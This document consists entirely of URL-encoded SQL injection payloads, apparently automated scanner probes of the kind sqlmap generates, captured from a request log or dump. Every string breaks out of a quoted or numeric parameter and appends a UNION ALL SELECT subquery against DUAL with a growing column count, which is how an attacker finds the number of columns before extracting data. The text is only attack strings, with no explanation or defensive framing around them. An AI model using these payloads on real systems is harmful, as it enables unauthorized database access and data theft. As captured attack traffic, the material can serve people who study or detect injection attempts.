-1200%27%20%7C%7C%20%28SELECT%203829%20FROM%20DUAL%20WHERE%207594%3D7594%20UNION%20ALL%20SELECT%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%2C%207594%23%20%29%20%7C%7C%20%27 -8557%27%20%7C%7C%20%28SELECT%205587%20FROM%20DUAL%20WHERE%209614%3D9614%20UNION%20ALL%20SELECT%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%2C%209614%23%20%29%20%7C%7C%20%27 -6507%27%20%7C%7C%20%28SELECT%208516%20FROM%20DUAL%20WHERE%209349%3D9349%20UNION%20ALL%20SELECT%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%2C%209349%23%20%29%20%7C%7C%20%27 -9298%27%20%7C%7C%20%28SELECT%205635%20FROM%20DUAL%20WHERE%202255%3D2255%20UNION%20ALL%20SELECT%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%2C%202255%23%20%29%20%7C%7C%20%27 -9010%27%20%7C%7C%20%28SELECT%209671%20FROM%20DUAL%20WHERE%201389%3D1389%20UNION%20ALL%20SELECT%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%23%20%29%20%7C%7C%20%27 -4977%27%20%7C%7C%20%28SELECT%208316%20FROM%20DUAL%20WHERE%206420%3D6420%20UNION%20ALL%20SELECT%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%2C%206420%23%20%29%20%7C%7C%20%27 -4073%27%20%7C%7C%20%28SELECT%202391%20FROM%20DUAL%20WHERE%201440%3D1440%20UNION%20ALL%20SELECT%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%2C%201440%23%20%29%20%7C%7C%20%27 -9327%27%20%7C%7C%20%28SELECT%209234%20FROM%20DUAL%20WHERE%201968%3D1968%20UNION%20ALL%20SELECT%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%23%20%29%20%7C%7C%20%27 -9520%27%20%7C%7C%20%28SELECT%204353%20FROM%20DUAL%20WHERE%202474%3D2474%20UNION%20ALL%20SELECT%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%2C%202474%23%20%29%20%7C%7C%20%27 -4448%27%20%7C%7C%20%28SELECT%203597%20WHERE%201488%3D1488%20UNION%20ALL%20SELECT%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%2C%201488%23%20%29%20%7C%7C%20%27 -6533%27%20%7C%7C%20%28SELECT%203109%20WHERE%202213%3D2213%20UNION%20ALL%20SELECT%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%2C%202213%23%20%29%20%7C%7C%20%27 -1111%27%20%7C%7C%20%28SELECT%207154%20WHERE%204958%3D4958%20UNION%20ALL%20SELECT%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%2C%204958%23%20%29%20%7C%7C%20%27 -3451%27%20%7C%7C%20%28SELECT%203849%20WHERE%206425%3D6425%20UNION%20ALL%20SELECT%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%2C%206425%23%20%29%20%7C%7C%20%27 -9715%27%20%7C%7C%20%28SELECT%209348%20WHERE%204079%3D4079%20UNION%20ALL%20SELECT%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%2C%204079%23%20%29%20%7C%7C%20%27 -3492%27%20%7C%7C%20%28SELECT%201382%20WHERE%209418%3D9418%20UNION%20ALL%20SELECT%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%23%20%29%20%7C%7C%20%27 -1223%27%20%7C%7C%20%28SELECT%207161%20WHERE%204526%3D4526%20UNION%20ALL%20SELECT%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%2C%204526%23%20%29%20%7C%7C%20%27 -9474%27%20%7C%7C%20%28SELECT%201940%20WHERE%201086%3D1086%20UNION%20ALL%20SELECT%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%23%20%29%20%7C%7C%20%27 -7488%27%20%7C%7C%20%28SELECT%208024%20WHERE%202611%3D2611%20UNION%20ALL%20SELECT%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%2C%202611%23%20%29%20%7C%7C%20%27 -2929%27%20%7C%7C%20%28SELECT%208062%20WHERE%208755%3D8755%20UNION%20ALL%20SELECT%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%2C%208755%23%20%29%20%7C%7C%20%27 -9097%20%2B%20%28SELECT%206416%20FROM%20DUAL%20WHERE%203437%3D3437%20UNION%20ALL%20SELECT%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%2C%203437%23%20%29 -6774%20%2B%20%28SELECT%201870%20FROM%20DUAL%20WHERE%208385%3D8385%20UNION%20ALL%20SELECT%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%2C%208385%23%20%29 -9990%20%2B%20%28SELECT%201858%20FROM%20DUAL%20WHERE%201510%3D1510%20UNION%20ALL%20SELECT%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%2C%201510%23%20%29 -1051%20%2B%20%28SELECT%202545%20FROM%20DUAL%20WHERE%202994%3D2994%20UNION%20ALL%20SELECT%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%2C%202994%23%20%29 -6515%20%2B%20%28SELECT%201722%20FROM%20DUAL%20WHERE%204030%3D4030%20UNION%20ALL%20SELECT%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%2C%204030%23%20%29 -5273%20%2B%20%28SELECT%207748%20FROM%20DUAL%20WHERE%209393%3D9393%20UNION%20ALL%20SELECT%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%2C%209393%23%20%29 -3162%20%2B%20%28SELECT%201641%20FROM%20DUAL%20WHERE%205631%3D5631%20UNION%20ALL%20SELECT%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%2C%205631%23%20%29 -4120%20%2B%20%28SELECT%203267%20FROM%20DUAL%20WHERE%202438%3D2438%20UNION%20ALL%20SELECT%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%23%20%29 -1713%20%2B%20%28SELECT%201627%20FROM%20DUAL%20WHERE%206749%3D6749%20UNION%20ALL%20SELECT%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%2C%206749%23%20%29 -9233%20%2B%20%28SELECT%201052%20FROM%20DUAL%20WHERE%201332%3D1332%20UNION%20ALL%20SELECT%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%2C%201332%23%20%29 -8573%20%2B%20%28SELECT%205598%20WHERE%201857%3D1857%20UNION%20ALL%20SELECT%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%2C%201857%23%20%29 -5417%20%2B%20%28SELECT%206796%20WHERE%201160%3D1160%20UNION%20ALL%20SELECT%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%23%20%29 -7622%20%2B%20%28SELECT%209883%20WHERE%204142%3D4142%20UNION%20ALL%20SELECT%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%2C%204142%23%20%29 -7697%20%2B%20%28SELECT%208125%20WHERE%207975%3D7975%20UNION%20ALL%20SELECT%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%2C%207975%23%20%29 -5093%20%2B%20%28SELECT%202524%20WHERE%201409%3D1409%20UNION%20ALL%20SELECT%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%2C%201409%23%20%29 -4335%20%2B%20%28SELECT%205720%20WHERE%208189%3D8189%20UNION%20ALL%20SELECT%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%2C%208189%23%20%29 -1979%20%2B%20%28SELECT%209046%20WHERE%206501%3D6501%20UNION%20ALL%20SELECT%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%23%20%29 -9483%20%2B%20%28SELECT%202122%20WHERE%202760%3D2760%20UNION%20ALL%20SELECT%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%2C%202760%23%20%29 -8695%20%2B%20%28SELECT%206370%20WHERE%202730%3D2730%20UNION%20ALL%20SELECT%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%2C%202730%23%20%29 -9491%20%2B%20%28SELECT%204324%20WHERE%206786%3D6786%20UNION%20ALL%20SELECT%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%23%20%29 -5277%27%20%2B%20%28SELECT%20%27ipTd%27%20FROM%20DUAL%20WHERE%203693%3D3693%20UNION%20ALL%20SELECT%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%23%20%29%20%2B%20%27 -9290%27%20%2B%20%28SELECT%20%27RrDv%27%20FROM%20DUAL%20WHERE%207333%3D7333%20UNION%20ALL%20SELECT%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%2C%207333%23%20%29%20%2B%20%27 -9433%27%20%2B%20%28SELECT%20%27fbAb%27%20FROM%20DUAL%20WHERE%204095%3D4095%20UNION%20ALL%20SELECT%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%2C%204095%23%20%29%20%2B%20%27 -9236%27%20%2B%20%28SELECT%20%27Eknx%27%20FROM%20DUAL%20WHERE%206554%3D6554%20UNION%20ALL%20SELECT%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%2C%206554%23%20%29%20%2B%20%27 -8858%27%20%2B%20%28SELECT%20%27nSsE%27%20FROM%20DUAL%20WHERE%202830%3D2830%20UNION%20ALL%20SELECT%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%2C%202830%23%20%29%20%2B%20%27 